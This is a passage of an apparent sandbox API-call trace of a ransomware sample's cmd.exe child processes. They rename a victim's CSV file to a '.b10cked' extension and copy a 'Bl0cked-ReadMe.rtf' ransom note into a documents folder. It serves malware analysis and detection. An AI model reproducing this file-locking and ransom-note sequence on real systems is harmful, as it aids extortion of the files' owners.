| out: lpLCData=".") returned 2 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: 
lpLCData=",") returned 2 [0232.726] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.727] GetConsoleTitleW (in: lpConsoleTitle=0x4b0960, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.727] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.728] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.728] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.728] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.728] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.728] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.728] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.728] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.732] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.733] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.733] _wcsicmp (_String1="move", 
_String2="PAUSE") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.733] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.733] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.733] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.733] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.735] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.735] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.735] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf7c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf7bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", 
lpVolumeSerialNumber=0x2cf7bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.736] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.736] _wcsicmp (_String1="GOL7OX~1.CSV", _String2=".") returned 57 [0232.736] _wcsicmp (_String1="GOL7OX~1.CSV", _String2="..") returned 57 [0232.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\gol7ox~1.csv")) returned 0x20 [0232.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c20f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", nBufferLength=0x104, lpBuffer=0x2cf14c, lpFilePart=0x2cf134 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", 
lpFilePart=0x2cf134*="GOL7OX~1.CSV") returned 0x48 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0232.737] _wcsicmp (_String1="GOL7OX~1.CSV", _String2=".") returned 57 [0232.737] _wcsicmp (_String1="GOL7OX~1.CSV", _String2="..") returned 57 [0232.737] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\gol7ox~1.csv")) returned 0x20 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", nBufferLength=0x104, lpBuffer=0x2cf5c8, lpFilePart=0x2cf360 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", lpFilePart=0x2cf360*="GOL7OX~1.CSV") returned 0x48 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", nBufferLength=0x104, lpBuffer=0x2cf7d0, lpFilePart=0x2cf360 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", lpFilePart=0x2cf360*="g ol7OxwE18leXod.csv.b10cked") returned 0x58 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] SetLastError (dwErrCode=0x0) [0232.738] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g 
ol7oxwe18lexod.csv.b10cked")) returned 0xffffffff [0232.738] GetLastError () returned 0x2 [0232.738] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", fInfoLevelId=0x1, lpFindFileData=0x2cecdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cecdc) returned 0x4c2308 [0232.738] FindNextFileW (in: hFindFile=0x4c2308, lpFindFileData=0x2cecdc | out: lpFindFileData=0x2cecdc) returned 0 [0232.738] GetLastError () returned 0x12 [0232.738] FindClose (in: hFindFile=0x4c2308 | out: hFindFile=0x4c2308) returned 1 [0232.740] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", fInfoLevelId=0x1, lpFindFileData=0x4c1e98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1e98) returned 0x4c2308 [0232.740] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", nBufferLength=0x104, lpBuffer=0x2cef74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", lpFilePart=0x0) returned 0x58 [0232.740] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv", nBufferLength=0x104, lpBuffer=0x2cef74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv", lpFilePart=0x0) returned 0x50 [0232.740] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv")) returned 0x20 [0232.740] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv.b10cked"), dwFlags=0x3) returned 1 [0232.740] FindClose (in: hFindFile=0x4c2308 | out: hFindFile=0x4c2308) returned 1 [0232.741] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cef28 | out: _Buffer=" 1") returned 9 [0232.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.741] GetFileType (hFile=0x7) returned 0x2 [0232.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceeb4 | out: lpMode=0x2ceeb4) returned 1 [0232.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.741] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceee8 | out: lpConsoleScreenBufferInfo=0x2ceee8) returned 1 [0232.741] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.742] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cef28 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.742] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cef0c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cef0c*=0x1a) returned 1 [0232.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.742] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.742] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.742] _get_osfhandle (_FileHandle=0) 
returned 0x3 [0232.742] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.742] SetConsoleInputExeNameW () returned 0x1 [0232.743] GetConsoleOutputCP () returned 0x1b5 [0232.743] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.743] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.743] exit (_Code=0) Process: id = "618" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34455 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34456 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34457 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34458 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 34459 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 
0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34460 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34461 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34462 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34463 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34464 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34831 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34832 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34833 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34834 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 34835 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34836 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 
mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34837 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34838 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34839 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34840 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34841 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34842 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34843 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34844 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34845 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000c0000" filename = "" Region: id = 34846 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34847 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34848 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 34849 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 34850 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 34851 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 34852 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 34853 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 34854 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 858 os_tid = 0x370 [0232.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf914 | out: lpSystemTimeAsFileTime=0x2cf914*(dwLowDateTime=0xbe319c40, dwHighDateTime=0x1d440a9)) [0232.599] GetCurrentProcessId () returned 0x9b8 [0232.599] GetCurrentThreadId () returned 0x370 [0232.599] GetTickCount () returned 0x3ffb2 [0232.599] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf90c | out: 
lpPerformanceCount=0x2cf90c*=28938833893) returned 1 [0232.600] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.600] __set_app_type (_Type=0x1) [0232.600] __p__fmode () returned 0x76b331f4 [0232.600] __p__commode () returned 0x76b331fc [0232.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.600] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.600] GetCurrentThreadId () returned 0x370 [0232.600] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x370) returned 0x38 [0232.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.600] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.601] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf8a4 | out: phkResult=0x2cf8a4*=0x0) returned 0x2 [0232.601] VirtualQuery (in: lpAddress=0x2cf8db, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.601] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf874, dwLength=0x1c | out: lpBuffer=0x2cf874*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0232.601] GetConsoleOutputCP () returned 0x1b5 [0232.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.602] GetEnvironmentStringsW () returned 0x3701d8* [0232.602] FreeEnvironmentStringsW (penv=0x3701d8) returned 1 [0232.602] GetEnvironmentStringsW () returned 0x3701d8* [0232.602] FreeEnvironmentStringsW (penv=0x3701d8) returned 1 [0232.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce814 | 